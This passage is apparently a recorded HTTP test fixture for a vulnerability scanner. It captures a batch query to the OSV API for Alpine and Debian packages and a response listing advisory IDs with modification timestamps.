"ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": 
"zlib" }, "version": "1.2.10-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/folder_of_supported_sbom_with_vulns url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 22298 body: | { "results": [ { "vulns": [ { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2011-3374", "modified": "2026-03-17T02:42:42.368242Z" }, { "id": "DEBIAN-CVE-2018-0501", "modified": "2025-11-19T02:04:24.786271Z" }, { "id": "DEBIAN-CVE-2019-3462", "modified": "2025-11-19T02:02:50.288367Z" }, { "id": "DEBIAN-CVE-2020-27350", "modified": "2025-11-19T01:06:21.507844Z" }, { "id": "DEBIAN-CVE-2020-3810", "modified": "2025-11-19T01:08:53.168851Z" }, { "id": "DSA-4685-1", "modified": "2026-03-09T02:09:03.263738Z" }, { "id": "DSA-4808-1", "modified": "2026-03-09T02:11:17.119108Z" } ] }, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2019-18276", "modified": "2025-11-19T01:19:06.470662Z" }, { "id": "DEBIAN-CVE-2022-3715", "modified": "2026-03-17T02:47:45.184492Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2016-2781", "modified": "2026-03-17T02:44:35.752995Z" }, { "id": "DEBIAN-CVE-2017-18018", 
"modified": "2026-03-17T02:45:06.555217Z" }, { "id": "DEBIAN-CVE-2024-0684", "modified": "2025-11-19T01:02:00.374806Z" }, { "id": "DEBIAN-CVE-2025-5278", "modified": "2026-03-17T02:52:23.723753Z" } ] }, {}, {}, { "vulns": [ { "id": "DLA-3482-1", "modified": "2025-05-26T07:01:25.263124Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2022-1664", "modified": "2025-11-20T10:15:48.083782Z" }, { "id": "DEBIAN-CVE-2025-6297", "modified": "2026-03-17T02:50:41.230667Z" }, { "id": "DEBIAN-CVE-2026-2219", "modified": "2026-03-14T15:06:12.109941Z" }, { "id": "DLA-3022-1", "modified": "2026-03-09T01:23:37.553205Z" }, { "id": "DSA-5147-1", "modified": "2026-03-09T02:10:11.335992Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2019-5094", "modified": "2025-11-19T02:02:52.019166Z" }, { "id": "DEBIAN-CVE-2019-5188", "modified": "2025-11-19T01:01:51.904490Z" }, { "id": "DEBIAN-CVE-2022-1304", "modified": "2025-11-20T10:15:47.847878Z" }, { "id": "DLA-3910-1", "modified": "2026-03-09T01:22:32.343795Z" }, { "id": "DSA-4535-1", "modified": "2026-03-09T02:10:12.902574Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-9493-h29p-rfm2", "modified": "2026-02-04T03:47:55.536228Z" }, { "id": "GHSA-cgrx-mc8f-2prm", "modified": "2026-02-04T02:50:45.342760Z" }, { "id": "GHSA-f3fp-gc8g-vw66", "modified": "2026-02-04T04:15:59.735117Z" }, { "id": "GHSA-g2j6-57v7-gm8c", "modified": "2026-02-04T02:43:58.212471Z" }, { "id": "GHSA-jfvp-7x6p-h2pv", "modified": "2026-02-04T03:12:37.981869Z" }, { "id": "GHSA-m8cg-xc2p-r3fc", "modified": "2026-02-04T03:29:19.767788Z" }, { "id": "GHSA-qw9x-cqr3-wc7r", "modified": "2026-02-04T02:13:22.313241Z" }, { "id": "GHSA-v95c-p5hm-xq8f", "modified": "2026-03-13T22:16:11.684125Z" }, { "id": "GHSA-vpvm-3wq2-2wvm", "modified": "2026-02-04T02:53:37.613379Z" }, { "id": "GHSA-xr7r-f8xq-vfvv", "modified": "2026-02-04T03:18:48.377509Z" }, { "id": "GO-2022-0274", "modified": "2026-02-04T02:26:28.343240Z" }, { "id": "GO-2022-0452", "modified": "2026-02-04T03:17:02.340230Z" }, { 
"id": "GO-2023-1627", "modified": "2026-02-04T03:58:42.107712Z" }, { "id": "GO-2023-1682", "modified": "2026-02-04T02:59:23.815900Z" }, { "id": "GO-2023-1683", "modified": "2026-02-04T04:01:58.343687Z" }, { "id": "GO-2024-2491", "modified": "2026-02-04T02:39:00.262696Z" }, { "id": "GO-2024-3110", "modified": "2026-02-04T02:23:26.560077Z" }, { "id": "GO-2025-4096", "modified": "2026-02-04T03:11:33.546218Z" }, { "id": "GO-2025-4097", "modified": "2026-02-04T03:00:55.376695Z" }, { "id": "GO-2025-4098", "modified": "2026-02-04T02:52:46.004719Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "GHSA-p782-xgp4-8hr8", "modified": "2026-02-04T04:15:14.486111Z" }, { "id": "GO-2022-0493", "modified": "2026-02-04T03:42:54.589715Z" } ] }, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2022-1271", "modified": "2025-11-20T10:15:47.940295Z" }, { "id": "DSA-5122-1", "modified": "2026-03-09T02:09:10.163691Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2017-0379", "modified": "2025-11-19T01:06:25.120079Z" }, { "id": "DEBIAN-CVE-2017-7526", "modified": "2025-11-19T02:04:40.318681Z" }, { "id": "DEBIAN-CVE-2018-0495", "modified": "2025-11-19T02:04:27.207183Z" }, { "id": "DEBIAN-CVE-2018-6829", "modified": "2026-03-10T05:05:47.263837Z" }, { "id": "DEBIAN-CVE-2019-13627", "modified": "2025-11-19T01:12:35.581705Z" }, { "id": "DEBIAN-CVE-2021-33560", "modified": "2026-03-10T05:07:08.938163Z" }, { "id": "DEBIAN-CVE-2021-40528", "modified": "2025-11-19T01:01:59.995618Z" }, { "id": "DEBIAN-CVE-2024-2236", "modified": "2026-03-10T05:09:58.705229Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2017-10790", "modified": "2025-11-19T01:01:57.855157Z" }, { "id": "DEBIAN-CVE-2018-1000654", "modified": "2025-11-19T02:02:40.642360Z" }, { "id": 
"DEBIAN-CVE-2018-6003", "modified": "2025-11-19T01:06:22.990063Z" }, { "id": "DEBIAN-CVE-2021-46848", "modified": "2025-11-20T10:15:14.681077Z" }, { "id": "DEBIAN-CVE-2024-12133", "modified": "2025-11-20T10:17:02.620233Z" }, { "id": "DEBIAN-CVE-2025-13151", "modified": "2026-01-20T05:13:20.502324Z" }, { "id": "DLA-3263-1", "modified": "2026-03-09T01:22:34.273046Z" }, { "id": "DLA-4061-1", "modified": "2026-03-09T01:20:16.124977Z" }, { "id": "DSA-5863-1", "modified": "2026-03-09T02:08:50.747280Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2016-3709", "modified": "2025-11-20T10:12:11.931996Z" }, { "id": "DEBIAN-CVE-2016-9318", "modified": "2025-11-19T02:02:45.582059Z" }, { "id": "DEBIAN-CVE-2017-0663", "modified": "2025-11-19T02:02:52.056836Z" }, { "id": "DEBIAN-CVE-2017-15412", "modified": "2025-11-19T01:08:49.499099Z" }, { "id": "DEBIAN-CVE-2017-16931", "modified": "2025-11-19T02:04:25.542166Z" }, { "id": "DEBIAN-CVE-2017-16932", "modified": "2025-11-19T01:04:39.458229Z" }, { "id": "DEBIAN-CVE-2017-18258", "modified": "2025-11-19T01:08:48.927062Z" }, { "id": "DEBIAN-CVE-2017-5130", "modified": "2025-11-19T01:03:12.822124Z" }, { "id": "DEBIAN-CVE-2017-5969", "modified": "2025-11-19T01:08:52.062516Z" }, { "id": "DEBIAN-CVE-2017-7375", "modified": "2025-11-19T02:02:48.011785Z" }, { "id": "DEBIAN-CVE-2017-7376", "modified": "2025-11-19T02:01:17.016443Z" }, { "id": "DEBIAN-CVE-2017-8872", "modified": "2025-11-19T02:04:31.920669Z" }, { "id": "DEBIAN-CVE-2017-9047", "modified": "2025-11-19T02:04:30.335407Z" }, { "id": "DEBIAN-CVE-2017-9048", "modified": "2025-11-19T01:19:09.303210Z" }, { "id": "DEBIAN-CVE-2017-9049", "modified": "2025-11-19T01:03:12.259406Z" }, { "id": "DEBIAN-CVE-2017-9050", "modified": "2025-11-19T01:08:53.069573Z" }, { "id": "DEBIAN-CVE-2018-14404", "modified": "2025-11-19T01:12:32.274520Z" }, { "id": "DEBIAN-CVE-2018-14567", "modified": "2025-11-19T01:08:49.660035Z" }, { "id": "DEBIAN-CVE-2019-19956", "modified": 
"2025-11-19T02:01:17.970372Z" }, { "id": "DEBIAN-CVE-2019-20388", "modified": "2025-11-19T02:04:37.363509Z" }, { "id": "DEBIAN-CVE-2020-24977", "modified": "2025-11-19T02:04:41.266003Z" }, { "id": "DEBIAN-CVE-2020-7595", "modified": "2025-11-19T02:04:29.271836Z" }, { "id": "DEBIAN-CVE-2021-3516", "modified": "2025-11-19T02:01:14.946107Z" }, { "id": "DEBIAN-CVE-2021-3517", "modified": "2025-11-19T01:12:34.981900Z" }, { "id": "DEBIAN-CVE-2021-3518", "modified": "2025-11-19T01:19:08.645337Z" }, { "id": "DEBIAN-CVE-2021-3537", "modified": "2025-11-19T02:04:30.248276Z" }, { "id": "DEBIAN-CVE-2021-3541", "modified": "2025-11-19T02:04:36.614917Z" }, { "id": "DEBIAN-CVE-2022-2309", "modified": "2025-11-20T10:15:28.694644Z" }, { "id": "DEBIAN-CVE-2022-23308", "modified": "2025-11-20T10:15:29.029152Z" }, { "id": "DEBIAN-CVE-2022-29824", "modified": "2025-11-20T10:15:52.814213Z" }, { "id": "DEBIAN-CVE-2022-40303", "modified": "2025-11-20T10:16:01.982632Z" }, { "id": "DEBIAN-CVE-2022-40304", "modified": "2025-11-20T10:16:01.918054Z" }, { "id": "DEBIAN-CVE-2022-49043", "modified": "2025-11-20T10:16:12.358770Z" }, { "id": "DEBIAN-CVE-2023-28484", "modified": "2025-11-20T10:16:35.199991Z" }, { "id": "DEBIAN-CVE-2023-29469", "modified": "2025-11-20T10:17:34.943682Z" }, { "id": "DEBIAN-CVE-2023-39615", "modified": "2025-11-20T10:16:41.593841Z" }, { "id": "DEBIAN-CVE-2023-45322", "modified": "2025-11-20T10:16:44.891362Z" }, { "id": "DEBIAN-CVE-2024-25062", "modified": "2025-11-20T10:17:04.986212Z" }, { "id": "DEBIAN-CVE-2024-34459", "modified": "2025-11-20T10:17:41.570595Z" }, { "id": "DEBIAN-CVE-2024-56171", "modified": "2025-11-20T10:17:48.605695Z" }, { "id": "DEBIAN-CVE-2025-24928", "modified": "2025-11-20T10:18:05.778161Z" }, { "id": "DEBIAN-CVE-2025-27113", "modified": "2025-11-20T10:18:06.358243Z" }, { "id": "DEBIAN-CVE-2025-32414", "modified": "2025-11-20T10:18:08.076077Z" }, { "id": "DEBIAN-CVE-2025-32415", "modified": "2025-11-20T10:18:08.251077Z" }, { "id": 
"DEBIAN-CVE-2025-49794", "modified": "2025-11-20T10:18:23.322205Z" }, { "id": "DEBIAN-CVE-2025-49796", "modified": "2025-11-20T10:18:23.585429Z" }, { "id": "DEBIAN-CVE-2025-6021", "modified": "2025-11-20T10:18:26.314947Z" }, { "id": "DEBIAN-CVE-2025-6170", "modified": "2025-11-20T10:18:26.670728Z" }, { "id": "DEBIAN-CVE-2025-8732", "modified": "2025-12-14T10:13:26.467517Z" }, { "id": "DEBIAN-CVE-2025-9714", "modified": "2026-01-10T14:08:12.148171Z" }, { "id": "DEBIAN-CVE-2026-0989", "modified": "2026-01-16T11:05:07.928323Z" }, { "id": "DEBIAN-CVE-2026-0990", "modified": "2026-01-16T11:05:23.527352Z" }, { "id": "DEBIAN-CVE-2026-0992", "modified": "2026-01-16T11:05:10.515041Z" }, { "id": "DEBIAN-CVE-2026-1757", "modified": "2026-02-03T11:16:44.779248Z" }, { "id": "DLA-3012-1", "modified": "2026-03-09T01:20:46.878115Z" }, { "id": "DLA-3172-1", "modified": "2026-03-09T01:19:54.747665Z" }, { "id": "DLA-3405-1", "modified": "2026-03-09T01:01:29.748040Z" }, { "id": "DLA-3878-1", "modified": "2026-03-09T01:20:38.676387Z" }, { "id": "DLA-4064-1", "modified": "2026-03-09T01:20:30.558703Z" }, { "id": "DLA-4146-1", "modified": "2026-03-09T01:22:43.732573Z" }, { "id": "DLA-4251-1", "modified": "2026-03-09T02:11:12.986866Z" }, { "id": "DLA-4319-1", "modified": "2025-09-30T22:17:08.381361Z" }, { "id": "DSA-5142-1", "modified": "2026-03-09T02:10:58.737631Z" }, { "id": "DSA-5271-1", "modified": "2026-03-09T02:10:55.154283Z" }, { "id": "DSA-5391-1", "modified": "2026-03-09T02:09:39.164621Z" }, { "id": "DSA-5949-1", "modified": "2026-03-09T02:09:32.257423Z" }, { "id": "DSA-5990-1", "modified": "2025-08-29T13:01:48.117026Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2018-0732", "modified": "2025-11-19T02:02:54.249966Z" }, { "id": "DEBIAN-CVE-2018-0734", "modified": "2025-11-19T02:02:43.768735Z" }, { "id": "DEBIAN-CVE-2018-0735", "modified": "2025-11-19T01:19:04.251217Z" }, { "id": "DEBIAN-CVE-2018-5407", "modified": 
"2025-11-19T01:02:00.203143Z" }, { "id": "DEBIAN-CVE-2019-1543", "modified": "2025-11-19T01:12:34.981629Z" }, { "id": "DEBIAN-CVE-2019-1547", "modified": "2025-11-19T01:12:35.687253Z" }, { "id": "DEBIAN-CVE-2019-1549", "modified": "2025-11-19T01:04:40.924710Z" }, { "id": "DEBIAN-CVE-2019-1551", "modified": "2025-11-19T01:19:08.067279Z" }, { "id": "DEBIAN-CVE-2019-1563", "modified": "2025-11-19T02:04:34.392400Z" }, { "id": "DEBIAN-CVE-2020-1967", "modified": "2025-11-19T02:04:38.886020Z" }, { "id": "DEBIAN-CVE-2020-1971", "modified": "2025-11-19T02:04:28.520483Z" }, { "id": "DEBIAN-CVE-2021-23840", "modified": "2025-11-19T01:03:14.356310Z" }, { "id": "DEBIAN-CVE-2021-23841", "modified": "2025-11-19T02:02:54.160482Z" }, { "id": "DEBIAN-CVE-2021-3449", "modified": "2025-11-19T01:04:41.495834Z" }, { "id": "DEBIAN-CVE-2021-3450", "modified": "2025-11-19T02:01:16.123253Z" }, { "id": "DEBIAN-CVE-2021-3711", "modified": "2025-11-20T10:15:44.121033Z" }, { "id": "DEBIAN-CVE-2021-3712", "modified": "2025-11-20T10:15:44.130193Z" }, { "id": "DEBIAN-CVE-2021-4160", "modified": "2025-11-20T10:15:10.185497Z" }, { "id": "DEBIAN-CVE-2022-0778", "modified": "2025-11-20T10:15:47.332694Z" }, { "id": "DEBIAN-CVE-2022-1292", "modified": "2025-11-20T10:15:25.471825Z" }, { "id": "DEBIAN-CVE-2022-2068", "modified": "2025-11-20T10:15:27.022420Z" }, { "id": "DEBIAN-CVE-2022-2097", "modified": "2025-11-20T10:15:27.065089Z" }, { "id": "DEBIAN-CVE-2022-2274", "modified": "2025-11-19T02:02:45.418259Z" }, { "id": "DEBIAN-CVE-2022-3358", "modified": "2025-11-19T01:06:25.721124Z" }, { "id": "DEBIAN-CVE-2022-3602", "modified": "2025-11-19T01:12:35.687556Z" }, { "id": "DEBIAN-CVE-2022-3786", "modified": "2025-11-19T01:19:02.748977Z" }, { "id": "DEBIAN-CVE-2022-3996", "modified": "2025-11-19T02:01:16.596616Z" }, { "id": "DEBIAN-CVE-2022-4203", "modified": "2025-11-19T02:01:16.313531Z" }, { "id": "DEBIAN-CVE-2022-4304", "modified": "2025-11-20T10:16:04.313466Z" }, { "id": "DEBIAN-CVE-2022-4450", 
"modified": "2025-11-20T10:16:05.367442Z" }, { "id": "DEBIAN-CVE-2023-0215", "modified": "2025-11-20T10:16:27.838296Z" }, { "id": "DEBIAN-CVE-2023-0216", "modified": "2025-11-19T02:04:35.947667Z" }, { "id": "DEBIAN-CVE-2023-0217", "modified": "2025-11-19T01:12:37.272749Z" }, { "id": "DEBIAN-CVE-2023-0286", "modified": "2025-11-20T10:16:27.985311Z" }, { "id": "DEBIAN-CVE-2023-0401", "modified": "2025-11-19T01:12:36.298552Z" }, { "id": "DEBIAN-CVE-2023-0464", "modified": "2025-11-20T10:16:28.057931Z" }, { "id": "DEBIAN-CVE-2023-0465", "modified": "2025-11-20T10:16:28.143046Z" }, { "id": "DEBIAN-CVE-2023-0466", "modified": "2025-11-20T10:16:28.053837Z" }, { "id": "DEBIAN-CVE-2023-1255", "modified": "2025-11-19T01:08:49.387669Z" }, { "id": "DEBIAN-CVE-2023-2650", "modified": "2025-11-20T10:17:34.439123Z" }, { "id": "DEBIAN-CVE-2023-2975", "modified": "2025-11-20T10:16:36.112183Z" }, { "id": "DEBIAN-CVE-2023-3446", "modified": "2025-11-20T10:16:38.860251Z" }, { "id": "DEBIAN-CVE-2023-3817", "modified": "2025-11-20T10:17:35.737266Z" }, { "id": "DEBIAN-CVE-2023-5363", "modified": "2025-11-20T10:16:59.430619Z" }, { "id": "DEBIAN-CVE-2023-5678", "modified": "2025-11-20T10:17:38.719690Z" }, { "id": "DEBIAN-CVE-2023-6129", "modified": "2025-11-20T10:17:39.029757Z" }, { "id": "DEBIAN-CVE-2023-6237", "modified": "2025-11-20T10:17:39.218097Z" }, { "id": "DEBIAN-CVE-2024-0727", "modified": "2025-11-20T10:17:01.258658Z" }, { "id": "DEBIAN-CVE-2024-12797", "modified": "2025-11-19T02:04:36.131726Z" }, { "id": "DEBIAN-CVE-2024-13176", "modified": "2026-03-17T02:49:44.824285Z" }, { "id": "DEBIAN-CVE-2024-2511", "modified": "2025-11-20T10:17:05.139581Z" }, { "id": "DEBIAN-CVE-2024-4603", "modified": "2025-11-20T10:17:43.955114Z" }, { "id": "DEBIAN-CVE-2024-4741", "modified": "2025-11-20T10:17:26.990307Z" }, { "id": "DEBIAN-CVE-2024-5535", "modified": "2025-11-20T10:17:48.194687Z" }, { "id": "DEBIAN-CVE-2024-6119", "modified": "2025-11-20T10:17:53.824117Z" }, { "id": 
"DEBIAN-CVE-2024-9143", "modified": "2025-11-20T10:17:55.864918Z" }, { "id": "DEBIAN-CVE-2025-11187", "modified": "2026-03-17T02:47:10.761659Z" }, { "id": "DEBIAN-CVE-2025-15467", "modified": "2026-03-17T02:51:11.866899Z" }, { "id": "DEBIAN-CVE-2025-15468", "modified": "2026-03-17T02:51:12.304672Z" }, { "id": "DEBIAN-CVE-2025-15469", "modified": "2026-03-17T02:51:12.299847Z" }, { "id": "DEBIAN-CVE-2025-27587", "modified": "2026-03-17T02:51:34.552234Z" }, { "id": "DEBIAN-CVE-2025-4575", "modified": "2025-11-19T02:02:43.971243Z" }, { "id": "DEBIAN-CVE-2025-66199", "modified": "2026-03-17T02:52:26.091887Z" }, { "id": "DEBIAN-CVE-2025-68160", "modified": "2026-03-17T02:50:42.645267Z" }, { "id": "DEBIAN-CVE-2025-69418", "modified": "2026-03-17T02:51:22.404226Z" }, { "id": "DEBIAN-CVE-2025-69419", "modified": "2026-03-17T02:51:22.497785Z" }, { "id": "DEBIAN-CVE-2025-69420", "modified": "2026-03-17T02:51:22.651361Z" }, { "id": "DEBIAN-CVE-2025-69421", "modified": "2026-03-17T02:51:22.561721Z" }, { "id": "DEBIAN-CVE-2025-9230", "modified": "2026-03-17T02:51:39.764914Z" }, { "id": "DEBIAN-CVE-2025-9231", "modified": "2026-03-17T02:51:39.727656Z" }, { "id": "DEBIAN-CVE-2025-9232", "modified": "2026-03-17T02:51:39.882696Z" }, { "id": "DEBIAN-CVE-2026-22795", "modified": "2026-03-17T02:51:47.646020Z" }, { "id": "DEBIAN-CVE-2026-22796", "modified": "2026-03-17T02:51:47.743030Z" }, { "id": "DEBIAN-CVE-2026-2673", "modified": "2026-03-18T09:03:28.363302Z" }, { "id": "DLA-3008-1", "modified": "2026-03-09T01:23:33.375630Z" }, { "id": "DLA-3325-1", "modified": "2026-03-09T01:19:40.983935Z" }, { "id": "DLA-3449-1", "modified": "2026-03-09T01:22:47.322805Z" }, { "id": "DLA-3530-1", "modified": "2026-03-09T01:19:28.929204Z" }, { "id": "DLA-3942-1", "modified": "2026-03-09T01:22:40.686044Z" }, { "id": "DLA-3942-2", "modified": "2026-03-09T01:21:01.728730Z" }, { "id": "DLA-4176-1", "modified": "2026-03-09T01:20:23.459313Z" }, { "id": "DLA-4321-1", "modified": 
"2025-10-03T16:33:24.717173Z" }, { "id": "DLA-4490-1", "modified": "2026-02-23T10:30:28.927832Z" }, { "id": "DSA-4539-1", "modified": "2026-03-09T02:09:20.276054Z" }, { "id": "DSA-4539-3", "modified": "2025-05-26T07:05:14.261652Z" }, { "id": "DSA-4661-1", "modified": "2026-03-09T02:08:53.792348Z" }, { "id": "DSA-4807-1", "modified": "2026-03-09T02:10:20.442914Z" }, { "id": "DSA-4855-1", "modified": "2026-03-09T02:11:29.405206Z" }, { "id": "DSA-4875-1", "modified": "2026-03-09T02:10:05.387501Z" }, { "id": "DSA-4963-1", "modified": "2026-03-09T02:10:15.488747Z" }, { "id": "DSA-5103-1", "modified": "2026-03-09T02:09:42.407559Z" }, { "id": "DSA-5139-1", "modified": "2026-03-09T02:09:17.334653Z" }, { "id": "DSA-5169-1", "modified": "2026-03-09T02:09:37.692763Z" }, { "id": "DSA-5343-1", "modified": "2026-03-09T02:09:47.149297Z" }, { "id": "DSA-5417-1", "modified": "2026-03-09T02:09:39.950679Z" }, { "id": "DSA-5532-1", "modified": "2026-03-09T02:08:31.395482Z" }, { "id": "DSA-5764-1", "modified": "2026-03-09T02:09:02.723874Z" }, { "id": "DSA-6015-1", "modified": "2025-10-01T13:32:01.848986Z" }, { "id": "DSA-6113-1", "modified": "2026-01-27T20:30:04.397078Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2011-4116", "modified": "2025-11-20T10:10:50.058601Z" }, { "id": "DEBIAN-CVE-2017-12837", "modified": "2025-11-19T01:03:14.361068Z" }, { "id": "DEBIAN-CVE-2017-12883", "modified": "2025-11-19T01:12:38.323688Z" }, { "id": "DEBIAN-CVE-2018-12015", "modified": "2025-11-19T02:02:49.033339Z" }, { "id": "DEBIAN-CVE-2018-18311", "modified": "2025-11-19T01:12:36.918544Z" }, { "id": "DEBIAN-CVE-2018-18312", "modified": "2025-11-19T02:04:33.584277Z" }, { "id": "DEBIAN-CVE-2018-18313", "modified": "2025-11-19T01:06:24.154928Z" }, { "id": "DEBIAN-CVE-2018-18314", "modified": "2025-11-19T01:12:35.416886Z" }, { "id": "DEBIAN-CVE-2018-6797", "modified": "2025-11-19T02:04:23.831823Z" }, { "id": "DEBIAN-CVE-2018-6798", "modified": "2025-11-19T02:02:49.628171Z" }, { "id": 
"DEBIAN-CVE-2018-6913", "modified": "2025-11-19T02:02:50.593437Z" }, { "id": "DEBIAN-CVE-2020-10543", "modified": "2025-11-19T01:04:39.904198Z" }, { "id": "DEBIAN-CVE-2020-10878", "modified": "2025-11-19T01:12:35.457057Z" }, { "id": "DEBIAN-CVE-2020-12723", "modified": "2025-11-19T02:02:47.094787Z" }, { "id": "DEBIAN-CVE-2020-16156", "modified": "2025-11-20T10:14:36.701112Z" }, { "id": "DEBIAN-CVE-2021-36770", "modified": "2025-11-20T10:15:44.080114Z" }, { "id": "DEBIAN-CVE-2022-48522", "modified": "2025-11-19T01:08:52.915564Z" }, { "id": "DEBIAN-CVE-2023-31484", "modified": "2025-11-20T10:17:35.627220Z" }, { "id": "DEBIAN-CVE-2023-31486", "modified": "2026-03-17T02:48:35.857896Z" }, { "id": "DEBIAN-CVE-2023-47038", "modified": "2025-11-20T10:16:46.343364Z" }, { "id": "DEBIAN-CVE-2024-56406", "modified": "2025-11-20T10:17:48.686371Z" }, { "id": "DEBIAN-CVE-2025-40909", "modified": "2025-11-20T10:18:21.143971Z" }, { "id": "DLA-3926-1", "modified": "2026-03-09T01:20:46.118633Z" }, { "id": "DSA-5902-1", "modified": "2026-03-09T02:09:19.793163Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3072-1", "modified": "2026-03-09T01:22:24.680239Z" }, { "id": "DLA-3189-1", "modified": "2025-05-26T07:01:07.887113Z" }, { "id": "DLA-3316-1", "modified": "2025-05-26T07:01:13.127412Z" }, { "id": "DLA-3422-1", "modified": "2026-03-09T01:20:56.692752Z" }, { "id": "DLA-3600-1", "modified": "2026-03-09T01:17:49.966197Z" }, { "id": "DLA-3651-1", "modified": "2026-03-09T01:18:05.310519Z" }, { "id": "DLA-3764-1", "modified": "2026-03-09T01:23:22.273526Z" }, { "id": "DSA-5135-1", "modified": "2026-03-09T02:11:21.646978Z" } ] }, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2017-17512", "modified": "2025-11-19T02:04:30.656495Z" } ] }, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2005-2541", "modified": "2026-03-17T02:42:47.789952Z" }, { "id": "DEBIAN-CVE-2018-20482", "modified": "2025-11-19T02:02:47.070832Z" }, { "id": "DEBIAN-CVE-2019-9923", "modified": "2025-11-19T02:02:53.559001Z" 
}, { "id": "DEBIAN-CVE-2021-20193", "modified": "2025-11-19T01:01:55.139356Z" }, { "id": "DEBIAN-CVE-2022-48303", "modified": "2025-11-20T10:16:07.552593Z" }, { "id": "DEBIAN-CVE-2023-39804", "modified": "2025-11-20T10:16:41.587973Z" }, { "id": "DLA-3755-1", "modified": "2026-03-09T01:18:04.185679Z" } ] }, { "vulns": [ { "id": "DLA-3051-1", "modified": "2025-05-26T07:01:56.257796Z" }, { "id": "DLA-3134-1", "modified": "2025-05-26T07:01:01.500124Z" }, { "id": "DLA-3161-1", "modified": "2025-05-26T07:01:03.882213Z" }, { "id": "DLA-3366-1", "modified": "2025-05-26T07:01:17.027142Z" }, { "id": "DLA-3412-1", "modified": "2025-05-26T07:01:20.109212Z" }, { "id": "DLA-3684-1", "modified": "2025-05-26T07:01:38.953691Z" }, { "id": "DLA-3788-1", "modified": "2025-05-26T07:01:46.700929Z" }, { "id": "DLA-3972-1", "modified": "2025-05-26T07:02:05.284676Z" }, { "id": "DLA-4085-1", "modified": "2025-05-26T07:02:10.958749Z" }, { "id": "DLA-4105-1", "modified": "2025-05-26T07:02:13.921097Z" }, { "id": "DLA-4403-1", "modified": "2025-12-12T10:13:37.154747Z" } ] }, { "vulns": [ { "id": "DLA-4016-1", "modified": "2025-05-26T07:02:06.504254Z" } ] }, { "vulns": [ { "id": "DEBIAN-CVE-2016-2779", "modified": "2025-11-19T01:12:38.591462Z" }, { "id": "DEBIAN-CVE-2018-7738", "modified": "2025-11-20T10:13:54.493707Z" }, { "id": "DEBIAN-CVE-2021-37600", "modified": "2025-11-19T02:02:43.997954Z" }, { "id": "DEBIAN-CVE-2021-3995", "modified": "2025-11-20T10:15:45.587792Z" }, { "id": "DEBIAN-CVE-2021-3996", "modified": "2025-11-20T10:15:45.602424Z" }, { "id": "DEBIAN-CVE-2022-0563", "modified": "2026-03-17T02:46:43.123134Z" }, { "id": "DEBIAN-CVE-2024-28085", "modified": "2025-11-20T10:17:41.612682Z" }, { "id": "DEBIAN-CVE-2025-14104", "modified": "2026-03-05T17:00:58.361610Z" }, { "id": "DEBIAN-CVE-2026-3184", "modified": "2026-02-26T09:30:44.219098Z" }, { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" }, { "id": "DSA-5055-1", "modified": "2026-03-09T02:10:40.826335Z" }, { "id": 
